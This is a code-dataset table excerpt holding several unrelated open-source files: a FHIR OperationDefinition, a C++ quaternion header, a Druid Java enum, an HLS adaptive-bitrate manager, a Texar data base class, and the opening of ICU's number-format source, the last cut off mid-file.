max_stars_count
int64 301
224k
| text
stringlengths 6
1.05M
| token_count
int64 3
727k
|
---|---|---|
648 | <reponame>swrobel/fhir
{"resourceType":"OperationDefinition","id":"CapabilityStatement-versions","meta":{"lastUpdated":"2019-11-01T09:29:23.356+11:00"},"extension":[{"url":"http://hl7.org/fhir/StructureDefinition/structuredefinition-fmm","valueInteger":5},{"url":"http://hl7.org/fhir/StructureDefinition/structuredefinition-standards-status","valueCode":"trial-use"}],"url":"http://hl7.org/fhir/OperationDefinition/CapabilityStatement-versions","version":"4.0.1","name":"Discover what versions a server supports","status":"draft","kind":"operation","date":"2019-11-01T09:29:23+11:00","publisher":"HL7 (FHIR Project)","contact":[{"telecom":[{"system":"url","value":"http://hl7.org/fhir"},{"system":"email","value":"<EMAIL>"}]}],"description":"Using the [FHIR Version Mime Type Parameter](http.html#version-parameter), a server can support [multiple versions on the same end-point](versioning.html#mt-version). The only way for client to find out what versions a server supports in this fashion is the $versions operation. The client invokes the operation with no parameters. and the server returns the list of supported versions, along with the default version it will use if no fhirVersion parameter is present","code":"versions","resource":["CapabilityStatement"],"system":true,"type":false,"instance":false,"parameter":[{"name":"version","use":"out","min":1,"max":"*","documentation":"A version supported by the server. Use the major.minor version like 3.0","type":"code"},{"name":"default","use":"out","min":1,"max":"1","documentation":"The default version for the server. Use the major.minor version like 3.0","type":"code"}]} | 445 |
606 | <gh_stars>100-1000
/******************************************************************************
* Copyright 2017-2018 Baidu Robotic Vision Authors. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*****************************************************************************/
#ifndef XP_INCLUDE_XP_MATH_XP_QUATERNION_H_
#define XP_INCLUDE_XP_MATH_XP_QUATERNION_H_
#include <Eigen/Core>
#include <Eigen/Geometry>
namespace XP {
class XpQuaternion : public Eigen::Vector4f {
// "Indirect Kalman Filter for 3D Attitude Estimation"
// x y z w
public:
// REQUIRED BY EIGEN
typedef Eigen::Vector4f Base;
// constructors
// XpQuaternion is Hamilton quaternion in the order of xyzw
// Eigen::Quaternion is also Hamiton quaternion in the order of wxyz
XpQuaternion();
template <typename Scalar>
XpQuaternion(Scalar q0, Scalar q1, Scalar q2, Scalar q3)
: Base{static_cast<float>(q0), static_cast<float>(q1),
static_cast<float>(q2), static_cast<float>(q3)} {
Eigen::Vector4f& q = *this;
q = q * (1.f / q.norm());
if (q(3) < 0) {
q = -q;
}
}
template <typename OtherDerived>
explicit XpQuaternion(
const Eigen::QuaternionBase<OtherDerived> &eigen_quat) {
SetFromEigenQuaternionf(eigen_quat);
}
// from MatrixBase - REQUIRED BY EIGEN
template <typename OtherDerived>
XpQuaternion(const MatrixBase<OtherDerived> &other) // NOLINT
: Base{other} {
Eigen::Vector4f& q = *this;
q = q * (1.f / q.norm());
if (q(3) < 0) {
q = -q;
}
}
// assignment operator - REQUIRED BY EIGEN
template <typename OtherDerived>
XpQuaternion &operator=(const MatrixBase<OtherDerived> &other) {
Base::operator=(other);
Eigen::Vector4f& q = *this;
q = q * (1.f / q.norm());
if (q(3) < 0) {
q = -q;
}
return *this;
}
inline float x() const { return (*this)[0]; }
inline float y() const { return (*this)[1]; }
inline float z() const { return (*this)[2]; }
inline float w() const { return (*this)[3]; }
// For more details on conversion to and from Hamiltonian quaternions
// see ref [2] and [3]
Eigen::Quaternionf ToEigenQuaternionf() const;
Eigen::Matrix3f ToRotationMatrix() const;
Eigen::Vector3f ToEulerRadians() const;
// set from Eigen Quaternion
template <typename OtherDerived>
void SetFromEigenQuaternionf(
const Eigen::QuaternionBase<OtherDerived> &eigen_quat) {
(*this)(0) = eigen_quat.x();
(*this)(1) = eigen_quat.y();
(*this)(2) = eigen_quat.z();
(*this)(3) = eigen_quat.w();
// keep scalar value non-negative
if ((*this)(3) < 0) {
(*this) = -(*this);
}
}
// set from RotationMatrix.
// http://www.euclideanspace.com/maths/geometry/rotations/conversions/
// matrixToQuaternion/
// Normalize the quaternion
void SetFromRotationMatrix(const Eigen::Matrix3f &R);
void SetFromEulerRadians(const Eigen::Vector3f& euler_rad);
// set from delta theta
// see page 8 on ref
// Not const & because dtheta is changed inside the function
void SetFromDeltaTheta(Eigen::Vector3f dtheta);
// v_lhs = R(q) * v_rhs
void SetFromTwoVectors(const Eigen::Vector3f& v_rhs, const Eigen::Vector3f& v_lhs);
// Hides Eigen::MatrixBase<>::inverse
XpQuaternion inverse() const;
XpQuaternion mul(const XpQuaternion& rhs) const;
};
// Builds the 4x4 Omega(w) matrix used in the quaternion derivative,
// laid out row by row via Eigen's comma initializer.
inline Eigen::Matrix4f XpComposeOmega(const Eigen::Vector3f& w) {
  Eigen::Matrix4f Ohm;
  Ohm <<   0.f, -w(2),  w(1),  w(0),
         w(2),   0.f, -w(0),  w(1),
        -w(1),  w(0),   0.f,  w(2),
        -w(0), -w(1), -w(2),   0.f;
  return Ohm;
}
// page 11
// Note we use Vector4f to represent quaternion instead of quaternion
// because it is better do not normalize q during integration
inline Eigen::Vector4f XpQuaternionDerivative(
    const Eigen::Vector4f &q,
    const Eigen::Vector3f &omega) {
  // q_dot = -0.5 * Omega(omega) * q.  NOTE(review): the leading minus sign
  // matches this file's Omega layout (see XpComposeOmega); confirm against
  // the reference paper's convention before reusing elsewhere.
  return -0.5 * XpComposeOmega(omega) * q;
}
XpQuaternion quat_multiply(const XpQuaternion& lhs, const XpQuaternion& rhs);
// page 11
void IntegrateQuaternion(const Eigen::Vector3f &omega_begin,
const Eigen::Vector3f &omega_end,
const XpQuaternion &q_begin,
const float dt,
XpQuaternion *q_end,
XpQuaternion *q_mid = nullptr,
XpQuaternion *q_fourth = nullptr,
XpQuaternion *q_eighth = nullptr);
} // namespace XP
#endif // XP_INCLUDE_XP_MATH_XP_QUATERNION_H_
| 2,145 |
5,813 | /*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.druid.indexing.overlord;
/**
* This enum is used as a parameter for several methods in {@link IndexerMetadataStorageCoordinator}, specifying whether
* only visible segments, or visible as well as overshadowed segments should be included in results.
*
* Visibility (and overshadowness - these terms are antonyms) may be defined on an interval (or a series of intervals).
* Consider the following example:
*
* |----| I
* |----| S'
* |-------| S
*
* Here, I denotes an interval in question, S and S' are segments. S' is newer (has a higher version) than S.
* Segment S is overshadowed (by S') on the interval I, though it's visible (non-overshadowed) outside of I: more
* specifically, it's visible on the interval [end of S', end of S].
*
* A segment is considered visible on a series of intervals if it's visible on any of the intervals in the series. A
* segment is considered (fully) overshadowed on a series of intervals if it's overshadowed (= non-visible) on all of
* the intervals in the series.
*
* If not specified otherwise, visibility (or overshadowness) should be assumed on the interval (-inf, +inf).
*/
public enum Segments
{
  /**
   * Specifies that only visible (i. e. non-overshadowed) segments should be
   * included in results. See the class-level Javadoc for the definition of
   * visibility over an interval.
   */
  ONLY_VISIBLE,
  /**
   * Specifies that visible as well as overshadowed segments should be
   * included in results.
   */
  INCLUDING_OVERSHADOWED
}
| 570 |
448 | #include "hls_adaptive_manager.h"
#include "general.h"
#ifdef __APPLE__
#include <ifaddrs.h>
#include <arpa/inet.h>
#include <net/if.h>
#else
#include "TrafficStats.h"
#endif
#define LOWER_SWITCH_VALUE (10*1000*1000)
#define UPPER_SWITCH_VALUE (30*1000*1000)
#include <utils/frame_work_log.h>
namespace Cicada {
// The buffer controller is injected later via SetBufferControlPtr().
AdaptiveBitrateManager::AdaptiveBitrateManager() : mBufferService(nullptr)
{
}
AdaptiveBitrateManager::~AdaptiveBitrateManager()
{
    // mBufferService is a borrowed pointer (set via SetBufferControlPtr) and
    // is intentionally not deleted here.
}
void AdaptiveBitrateManager::SetCurrentBitrate(int bitrate)
{
    // Record the bitrate of the currently selected stream; compared against
    // the values registered via AddStreamInfo() when deciding to switch.
    mCurrentBitrate = bitrate;
}
void AdaptiveBitrateManager::SetBufferControlPtr(BufferController *bufferService)
{
    // Borrowed pointer used to query the buffered video duration; ownership
    // stays with the caller.
    mBufferService = bufferService;
}
void AdaptiveBitrateManager::clear()
{
    // Reset all measurement and switching state back to a just-constructed
    // state (e.g. when playback restarts or the source changes).
    mLastDownloadBytes = 0;
    mMaxDownloadSpeed = 0;
    mSpanDownloadSpeed = 0;
    mLastSpanDownloadSpeed = 0;
    mStreamIndexBitrateMap.clear();
    mCurrentBitrate = 0;
    mStartTime = INT64_MIN;
    mLastSwitchTime = INT64_MIN;
    mLastVideoDuration = INT64_MIN;
    // NOTE(review): assumes mDurationStatics holds exactly 10 ints — confirm
    // against the declaration in the header.
    memset(mDurationStatics, 0, 10 * sizeof(int));
    mDurationCount = 0;
    mBitrates.clear();
}
// Returns the cumulative received-byte count across all non-loopback network
// interfaces, or 0 on failure / unsupported platforms.
int64_t AdaptiveBitrateManager::getInterfaceBytes()
{
#ifdef __APPLE__
    struct ifaddrs *ifa_list = nullptr, *ifa;

    if (getifaddrs(&ifa_list) == -1) {
        return 0;
    }

    // 64-bit accumulator: the previous uint32_t sum wrapped after 4 GiB of
    // total traffic, producing bogus (negative) deltas in OnSecondTimer.
    uint64_t iBytes = 0;

    for (ifa = ifa_list; ifa; ifa = ifa->ifa_next) {
        // getifaddrs() may return entries whose ifa_addr is NULL; the old
        // code dereferenced it unconditionally and could crash.
        if (ifa->ifa_addr == nullptr || AF_LINK != ifa->ifa_addr->sa_family) {
            continue;
        }
        // NOTE(review): this skips only interfaces that are neither UP nor
        // RUNNING; if the intent is "must be UP and RUNNING", the && should
        // be || — kept as-is to preserve existing behavior.
        if (!(ifa->ifa_flags & IFF_UP) && !(ifa->ifa_flags & IFF_RUNNING)) {
            continue;
        }
        if (ifa->ifa_data == nullptr) {
            continue;
        }
        /* Not a loopback device. */
        if (strncmp(ifa->ifa_name, "lo", 2)) {
            struct if_data *if_data = (struct if_data *) ifa->ifa_data;
            // Only received bytes are needed; the old oBytes accumulator was
            // computed but never used, so it has been removed.
            iBytes += if_data->ifi_ibytes;
        }
    }

    freeifaddrs(ifa_list);
    return (int64_t) iBytes;
#else
    //TODO: android get bytes
#ifndef WIN32
    uint64_t byteNums = getIfaceStatType(NULL, IfaceStatType::RX_BYTES);
    AF_LOGD("android get bytes .. %lld", byteNums);
    return byteNums;
#endif
#endif
    return 0;
}
void AdaptiveBitrateManager::reset()
{
    // Clear only the buffer-trend statistics (unlike clear(), which also
    // resets download counters and the registered stream table).
    memset(mDurationStatics, 0, 10 * sizeof(int));
    mDurationCount = 0;
    mLastVideoDuration = INT64_MIN;
}
// Register one stream: remember which stream index serves the given bitrate,
// and keep the bitrate list sorted ascending for the switch logic.
void AdaptiveBitrateManager::AddStreamInfo(int streamIndex, int bitrate)
{
    mStreamIndexBitrateMap.emplace(bitrate, streamIndex);
    mBitrates.push_back(bitrate);
    sort(mBitrates.begin(), mBitrates.end());
}
void AdaptiveBitrateManager::SetCallback(streamAdaptChanged callback, void *userData)
{
    // Callback invoked (with userData) whenever a stream switch is requested.
    mCallback = callback;
    mUserData = userData;
}
void AdaptiveBitrateManager::setCanSwitch(bool canSwitch)
{
    // Enable/disable adaptive switching, and restart trend collection so
    // stale samples from before the toggle do not drive the next decision.
    mCanSwitch = canSwitch;
    reset();
}
void AdaptiveBitrateManager::ProcessSwitchStream(int64_t curTime)
{
    // Decide whether to switch down (buffer draining) or up (buffer full and
    // growing), based on the buffered video duration and its recent trend.
    if (mBufferService == nullptr) {
        return;
    }
    if (!mCanSwitch) {
        return;
    }
    int64_t duration = mBufferService->GetPacketDuration(BUFFER_TYPE_VIDEO);
    // 10-slot ring of +1/-1 samples: +1 when the buffered duration grew since
    // the previous tick, -1 otherwise.
    if (duration > mLastVideoDuration) {
        mDurationStatics[mDurationCount++] = 1;
    } else {
        mDurationStatics[mDurationCount++] = -1;
    }
    mDurationCount = mDurationCount % 10;
    mLastVideoDuration = duration;
    // Rate-limit: at most one switch per 10 seconds (assumes curTime is in
    // milliseconds — TODO confirm with the OnSecondTimer caller).
    if (mLastSwitchTime != INT64_MIN && curTime - mLastSwitchTime < 10 * 1000) {
        return;
    }
    // Net trend over the last 10 ticks: +10 = steadily growing, -10 = draining.
    int totalUp = 0;
    for (int i = 0; i < 10; i++) {
        totalUp += mDurationStatics[i];
    }
    // NOTE(review): mLastVideoDuration was just updated above, so this log
    // prints the current duration twice rather than current + previous.
    AF_LOGD("mDurationStatics is %d,duration is %lld,last duration is %lld", totalUp, duration, mLastVideoDuration);
    if ((duration < LOWER_SWITCH_VALUE && totalUp <= -8)) {
        // Buffer low and mostly shrinking: drop to the highest bitrate that
        // still fits within the last measured download speed.
        int count = (int) mBitrates.size();
        if (count != 0) {
            int bitrate = -1;
            for (int i = count - 1; i >= 0; i--) {
                if (mBitrates[i] <= mLastSpanDownloadSpeed) {
                    bitrate = mBitrates[i];
                    break;
                }
            }
            if (bitrate == -1) {
                // Nothing fits: fall back to the lowest available bitrate.
                bitrate = mBitrates[0];
            }
            if (mCurrentBitrate != bitrate) {
                mCurrentBitrate = bitrate;
                if (mCallback) {
                    map<int, int>::iterator iter = mStreamIndexBitrateMap.find(mCurrentBitrate);
                    if (iter != mStreamIndexBitrateMap.end()) {
                        int index = iter->second;
                        mCallback(index, mUserData);
                        // Block further switches until setCanSwitch(true).
                        mCanSwitch = false;
                        mLastSwitchTime = curTime;
                    }
                }
            }
        }
    } else if (duration >= UPPER_SWITCH_VALUE && totalUp >= 8) {
        // Buffer comfortable and mostly growing: try stepping up.
        int bitrate = -1;
        int currentIndex = -1;
        int count = (int) mBitrates.size();
        for (int i = 0; i < count; i++) {
            if (mBitrates[i] == mCurrentBitrate) {
                currentIndex = i;
                break;
            }
        }
        if (currentIndex == count - 1) {
            // Already at the top bitrate.
            return;
        }
        if (mLastSpanDownloadSpeed > mBitrates[currentIndex + 1]) {
            // Bandwidth allows skipping ahead: pick the first bitrate at or
            // above the measured speed.
            // NOTE(review): if the speed exceeds every remaining bitrate this
            // loop selects nothing (bitrate stays -1) — possibly should jump
            // to the top entry; confirm intent.
            for (int i = currentIndex + 2; i < count; i++) {
                if (mLastSpanDownloadSpeed <= mBitrates[i]) {
                    currentIndex = i;
                    bitrate = mBitrates[i];
                    break;
                }
            }
        } else {
            // Otherwise move up a single step.
            bitrate = mBitrates[currentIndex + 1];
        }
        if (bitrate != -1 && mCurrentBitrate != bitrate) {
            mCurrentBitrate = bitrate;
            if (mCallback) {
                map<int, int>::iterator iter = mStreamIndexBitrateMap.find(mCurrentBitrate);
                if (iter != mStreamIndexBitrateMap.end()) {
                    int index = iter->second;
                    mCallback(index, mUserData);
                    mCanSwitch = false;
                    mLastSwitchTime = curTime;
                }
            }
        }
    }
}
// Per-tick bookkeeping: sample the interface byte counter, derive the
// download speed, update the span maximum, and run the switch decision.
void AdaptiveBitrateManager::OnSecondTimer(int64_t curTime)
{
    if (mStartTime == INT64_MIN) {
        mStartTime = curTime;
        mLastSwitchTime = curTime;
    }

    // Take a single counter snapshot per tick.  The previous code called
    // getInterfaceBytes() twice (once for the delta, once to refresh
    // mLastDownloadBytes), silently dropping the bytes downloaded between
    // the two reads from the next interval's measurement.
    int64_t currentBytes = getInterfaceBytes();

    if (mLastDownloadBytes == 0) {
        // First sample: just establish the baseline.
        mLastDownloadBytes = currentBytes;
    } else {
        int64_t downloadBytes = currentBytes - mLastDownloadBytes;
        int downloadSpeed = (int) downloadBytes / (1024);  // KiB per tick

        if (mMaxDownloadSpeed < downloadSpeed) {
            mMaxDownloadSpeed = downloadSpeed;
        }
        if (mSpanDownloadSpeed < downloadSpeed) {
            mSpanDownloadSpeed = downloadSpeed;
        }
        // Every mUpdateSpan, publish the span maximum as the speed estimate
        // used by ProcessSwitchStream and start a new span.
        if (curTime - mStartTime > mUpdateSpan) {
            mLastSpanDownloadSpeed = mSpanDownloadSpeed;
            mSpanDownloadSpeed = 0;
            mStartTime = curTime;
        }
        // Log text fixed: it previously said "download speed" twice even
        // though the first value is the running maximum.
        AF_LOGD("max download speed is %d,download speed is %d", mMaxDownloadSpeed, downloadSpeed);
        mLastDownloadBytes = currentBytes;
        ProcessSwitchStream(curTime);
    }
}
}//namespace Cicada
| 4,095 |
1,609 | <filename>src/main/java/com/mossle/humantask/engine/HumanTask.java
package com.mossle.humantask.engine;
/**
 * Empty placeholder type in the human-task engine package.  No state or
 * behavior is implemented yet; the class currently only reserves the name.
 */
public class HumanTask {
}
| 49 |
2,325 | <reponame>dyoshioka-555/texar
# Copyright 2018 The Texar Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Base data class that is enherited by all data classes.
A data defines data reading, parsing, batching, and other
preprocessing operations.
"""
import tensorflow as tf
from texar.tf.hyperparams import HParams
from texar.tf.data.data import dataset_utils as dsutils
from texar.tf.data.data_utils import count_file_lines
__all__ = [
"DataBase"
]
class DataBase(object):
    """Base class inherited by all data classes.
    """
    def __init__(self, hparams):
        # Merge user-provided hyperparameters over the defaults; unknown keys
        # raise inside HParams.
        self._hparams = HParams(hparams, self.default_hparams())
    @staticmethod
    def default_hparams():
        """Returns a dictionary of default hyperparameters.
        .. code-block:: python
            {
                "num_epochs": 1,
                "batch_size": 64,
                "allow_smaller_final_batch": True,
                "shuffle": True,
                "shuffle_buffer_size": None,
                "shard_and_shuffle": False,
                "num_parallel_calls": 1,
                "prefetch_buffer_size": 0,
                "max_dataset_size": -1,
                "seed": None,
                "name": "data",
            }
        Here:
        "num_epochs": int
            Number of times the dataset should be repeated. An
            :tf_main:`OutOfRangeError <errors/OutOfRangeError>` signal will
            be raised after the whole repeated dataset has been iterated
            through.
            E.g., For training data, set it to 1 (default) so that you
            will get the signal after each epoch of training. Set to -1
            to repeat the dataset indefinitely.
        "batch_size": int
            Batch size, i.e., the number of consecutive elements of the
            dataset to combine in a single batch.
        "allow_smaller_final_batch": bool
            Whether to allow the final batch to be smaller if there are
            insufficient elements left. If `False`, the final batch is
            discarded if it is smaller than batch size. Note that,
            if `True`, `output_shapes` of the resulting dataset
            will have a **static** batch_size dimension equal to
            "batch_size".
        "shuffle": bool
            Whether to randomly shuffle the elements of the dataset.
        "shuffle_buffer_size": int
            The buffer size for data shuffling. The larger, the better
            the resulting data is mixed.
            If `None` (default), buffer size is set to the size of the
            whole dataset (i.e., make the shuffling the maximally
            effective).
        "shard_and_shuffle": bool
            Whether to first shard the dataset and then shuffle each
            block respectively. Useful when the whole data is too large to
            be loaded efficiently into the memory.
            If `True`, :attr:`shuffle_buffer_size` must be specified to
            determine the size of each shard.
        "num_parallel_calls": int
            Number of elements from the datasets to process in parallel.
        "prefetch_buffer_size": int
            The maximum number of elements that will be buffered when
            prefetching.
        max_dataset_size : int
            Maximum number of instances to include in
            the dataset. If set to `-1` or greater than the size of
            dataset, all instances will be included. This constraint is
            imposed after data shuffling and filtering.
        seed : int, optional
            The random seed for shuffle.
            Note that if a seed is set, the shuffle order will be exact
            the same every time when going through the (repeated) dataset.
            For example, consider a dataset with elements [1, 2, 3], with
            ``"num_epochs" = 2`` and some fixed seed, the resulting sequence
            can be: 2 1 3, 1 3 2 | 2 1 3, 1 3 2, ... That is, the orders are
            different **within** every `num_epochs`, but are the same
            **across** the `num_epochs`.
        name : str
            Name of the data.
        """
        return {
            "name": "data",
            "num_epochs": 1,
            "batch_size": 64,
            "allow_smaller_final_batch": True,
            "shuffle": True,
            "shuffle_buffer_size": None,
            "shard_and_shuffle": False,
            "num_parallel_calls": 1,
            "prefetch_buffer_size": 0,
            "max_dataset_size": -1,
            "seed": None
        }
    @staticmethod
    def _make_batch(dataset, hparams, padded_batch=False, padding_values=None):
        # Repeat first so that batches may span epoch boundaries when
        # allow_smaller_final_batch is False.
        dataset = dataset.repeat(hparams.num_epochs)
        batch_size = hparams["batch_size"]
        if hparams["allow_smaller_final_batch"]:
            if padded_batch:
                dataset = dataset.padded_batch(
                    batch_size, dataset.output_shapes,
                    padding_values=padding_values)
            else:
                dataset = dataset.batch(batch_size)
        else:
            # NOTE(review): the drop-remainder path always uses the *padded*
            # variant, even when padded_batch=False — confirm this is
            # intentional (it is harmless for fully-static shapes).
            dataset = dataset.apply(
                tf.contrib.data.padded_batch_and_drop_remainder(
                    batch_size, dataset.output_shapes,
                    padding_values=padding_values))
        return dataset
    @staticmethod
    def _shuffle_dataset(dataset, hparams, dataset_files):
        # Returns (dataset, dataset_size); dataset_size is only computed
        # (file-line count) when needed, otherwise None.
        dataset_size = None
        shuffle_buffer_size = hparams["shuffle_buffer_size"]
        if hparams["shard_and_shuffle"]:
            if shuffle_buffer_size is None:
                raise ValueError(
                    "Dataset hyperparameter 'shuffle_buffer_size' "
                    "must not be `None` if 'shard_and_shuffle'=`True`.")
            dataset_size = count_file_lines(dataset_files)
            if shuffle_buffer_size >= dataset_size:
                raise ValueError(
                    "Dataset size (%d) <= shuffle_buffer_size (%d). Set "
                    "shuffle_and_shard to `False`." %
                    (dataset_size, shuffle_buffer_size))
            # TODO(zhiting): Use a different seed?
            dataset = dataset.apply(dsutils.random_shard_dataset(
                dataset_size, shuffle_buffer_size, hparams["seed"]))
            dataset = dataset.shuffle(shuffle_buffer_size + 16,  # add a margin
                                      seed=hparams["seed"])
        elif hparams["shuffle"]:
            if shuffle_buffer_size is None:
                # Default: buffer the whole dataset for a full shuffle.
                dataset_size = count_file_lines(dataset_files)
                shuffle_buffer_size = dataset_size
            dataset = dataset.shuffle(shuffle_buffer_size, seed=hparams["seed"])
        return dataset, dataset_size
    @property
    def num_epochs(self):
        """Number of epochs.
        """
        return self._hparams.num_epochs
    @property
    def batch_size(self):
        """The batch size.
        """
        return self._hparams.batch_size
    @property
    def hparams(self):
        """A :class:`~texar.tf.HParams` instance of the
        data hyperparameters.
        """
        return self._hparams
    @property
    def name(self):
        """Name of the module.
        """
        return self._hparams.name
| 3,656 |
4,879 | <reponame>EdwardPrentice/wrongo
/*
*******************************************************************************
* Copyright (C) 1997-2015, International Business Machines Corporation and
* others. All Rights Reserved.
*******************************************************************************
*
* File NUMFMT.CPP
*
* Modification History:
*
* Date Name Description
* 02/19/97 aliu Converted from java.
* 03/18/97 clhuang Implemented with C++ APIs.
* 04/17/97 aliu Enlarged MAX_INTEGER_DIGITS to fully accomodate the
* largest double, by default.
* Changed DigitCount to int per code review.
* 07/20/98 stephen Changed operator== to check for grouping
* Changed setMaxIntegerDigits per Java implementation.
* Changed setMinIntegerDigits per Java implementation.
* Changed setMinFractionDigits per Java implementation.
* Changed setMaxFractionDigits per Java implementation.
********************************************************************************
*/
#include "unicode/utypes.h"
#if !UCONFIG_NO_FORMATTING
#include "unicode/numfmt.h"
#include "unicode/locid.h"
#include "unicode/dcfmtsym.h"
#include "unicode/decimfmt.h"
#include "unicode/ustring.h"
#include "unicode/ucurr.h"
#include "unicode/curramt.h"
#include "unicode/numsys.h"
#include "unicode/rbnf.h"
#include "unicode/localpointer.h"
#include "unicode/udisplaycontext.h"
#include "charstr.h"
#include "winnmfmt.h"
#include "uresimp.h"
#include "uhash.h"
#include "cmemory.h"
#include "servloc.h"
#include "ucln_in.h"
#include "cstring.h"
#include "putilimp.h"
#include "uassert.h"
#include "umutex.h"
#include "mutex.h"
#include "digitlst.h"
#include <float.h>
#include "sharednumberformat.h"
#include "unifiedcache.h"
//#define FMT_DEBUG
#ifdef FMT_DEBUG
#include <stdio.h>
// Debug-only helper: dump a UnicodeString to stdout.  The extracted length
// is clamped so strings longer than the local buffer cannot overflow it
// (the original passed s.length() unconditionally into a 2000-byte buffer).
static inline void debugout(UnicodeString s) {
    char buf[2000];
    int32_t len = s.length();
    if (len > (int32_t)sizeof(buf) - 1) {
        len = (int32_t)sizeof(buf) - 1;
    }
    // extract() to a char* target also NUL-terminates — TODO confirm for the
    // ICU version in use.
    s.extract((int32_t) 0, len, buf);
    printf("%s", buf);
}
#define debug(x) printf("%s", x);
#else
#define debugout(x)
#define debug(x)
#endif
// If no number pattern can be located for a locale, this is the last
// resort. The patterns are same as the ones in root locale.
// Each array below is a NUL-terminated UChar (UTF-16 code unit) string; the
// trailing C comment shows the pattern it spells out.
static const UChar gLastResortDecimalPat[] = {
    0x23, 0x2C, 0x23, 0x23, 0x30, 0x2E, 0x23, 0x23, 0x23, 0 /* "#,##0.###" */
};
static const UChar gLastResortCurrencyPat[] = {
    0xA4, 0xA0, 0x23, 0x2C, 0x23, 0x23, 0x30, 0x2E, 0x30, 0x30, 0 /* "\u00A4\u00A0#,##0.00" */
};
static const UChar gLastResortPercentPat[] = {
    0x23, 0x2C, 0x23, 0x23, 0x30, 0x25, 0 /* "#,##0%" */
};
static const UChar gLastResortScientificPat[] = {
    0x23, 0x45, 0x30, 0 /* "#E0" */
};
static const UChar gLastResortIsoCurrencyPat[] = {
    0xA4, 0xA4, 0xA0, 0x23, 0x2C, 0x23, 0x23, 0x30, 0x2E, 0x30, 0x30, 0 /* "\u00A4\u00A4\u00A0#,##0.00" */
};
static const UChar gLastResortPluralCurrencyPat[] = {
    0x23, 0x2C, 0x23, 0x23, 0x30, 0x2E, 0x23, 0x23, 0x23, 0x20, 0xA4, 0xA4, 0xA4, 0 /* "#,##0.### \u00A4\u00A4\u00A4" */
};
static const UChar gLastResortAccountingCurrencyPat[] = {
    0xA4, 0xA0, 0x23, 0x2C, 0x23, 0x23, 0x30, 0x2E, 0x30, 0x30, 0 /* "\u00A4\u00A0#,##0.00" */
};
static const UChar gSingleCurrencySign[] = {0xA4, 0};
static const UChar gDoubleCurrencySign[] = {0xA4, 0xA4, 0};
static const UChar gSlash = 0x2f;
// If the maximum base 10 exponent were 4, then the largest number would
// be 99,999 which has 5 digits.
// On IEEE754 systems gMaxIntegerDigits is 308 + possible denormalized 15 digits + rounding digit
// With big decimal, the max exponent is 999,999,999 and the max number of digits is the same, 999,999,999
const int32_t icu::NumberFormat::gDefaultMaxIntegerDigits = 2000000000;
const int32_t icu::NumberFormat::gDefaultMinIntegerDigits = 127;
// Indexed by UNumberFormatStyle; NULL means the style has no last-resort
// pattern (e.g. rule-based styles).
static const UChar * const gLastResortNumberPatterns[UNUM_FORMAT_STYLE_COUNT] = {
    NULL,  // UNUM_PATTERN_DECIMAL
    gLastResortDecimalPat,  // UNUM_DECIMAL
    gLastResortCurrencyPat,  // UNUM_CURRENCY
    gLastResortPercentPat,  // UNUM_PERCENT
    gLastResortScientificPat,  // UNUM_SCIENTIFIC
    NULL,  // UNUM_SPELLOUT
    NULL,  // UNUM_ORDINAL
    NULL,  // UNUM_DURATION
    NULL,  // UNUM_NUMBERING_SYSTEM
    NULL,  // UNUM_PATTERN_RULEBASED
    gLastResortIsoCurrencyPat,  // UNUM_CURRENCY_ISO
    gLastResortPluralCurrencyPat,  // UNUM_CURRENCY_PLURAL
    gLastResortAccountingCurrencyPat, // UNUM_CURRENCY_ACCOUNTING
    gLastResortCurrencyPat,  // UNUM_CASH_CURRENCY
    NULL,  // UNUM_DECIMAL_COMPACT_SHORT
    NULL,  // UNUM_DECIMAL_COMPACT_LONG
    gLastResortCurrencyPat,  // UNUM_CURRENCY_STANDARD
};
// Keys used for accessing resource bundles
static const char *gNumberElements = "NumberElements";
static const char *gLatn = "latn";
static const char *gPatterns = "patterns";
// Resource-bundle pattern key per UNumberFormatStyle; NULL for styles whose
// patterns do not come from the bundle.
static const char *gFormatKeys[UNUM_FORMAT_STYLE_COUNT] = {
    NULL,  // UNUM_PATTERN_DECIMAL
    "decimalFormat",  // UNUM_DECIMAL
    "currencyFormat",  // UNUM_CURRENCY
    "percentFormat",  // UNUM_PERCENT
    "scientificFormat",  // UNUM_SCIENTIFIC
    NULL,  // UNUM_SPELLOUT
    NULL,  // UNUM_ORDINAL
    NULL,  // UNUM_DURATION
    NULL,  // UNUM_NUMBERING_SYSTEM
    NULL,  // UNUM_PATTERN_RULEBASED
    // For UNUM_CURRENCY_ISO and UNUM_CURRENCY_PLURAL,
    // the pattern is the same as the pattern of UNUM_CURRENCY
    // except for replacing the single currency sign with
    // double currency sign or triple currency sign.
    "currencyFormat",  // UNUM_CURRENCY_ISO
    "currencyFormat",  // UNUM_CURRENCY_PLURAL
    "accountingFormat",  // UNUM_CURRENCY_ACCOUNTING
    "currencyFormat",  // UNUM_CASH_CURRENCY
    NULL,  // UNUM_DECIMAL_COMPACT_SHORT
    NULL,  // UNUM_DECIMAL_COMPACT_LONG
    "currencyFormat",  // UNUM_CURRENCY_STANDARD
};
// Static hashtable cache of NumberingSystem objects used by NumberFormat
// (guarded by nscacheMutex; torn down in numfmt_cleanup()).
static UHashtable * NumberingSystem_cache = NULL;
static UMutex nscacheMutex = U_MUTEX_INITIALIZER;
static icu::UInitOnce gNSCacheInitOnce = U_INITONCE_INITIALIZER;
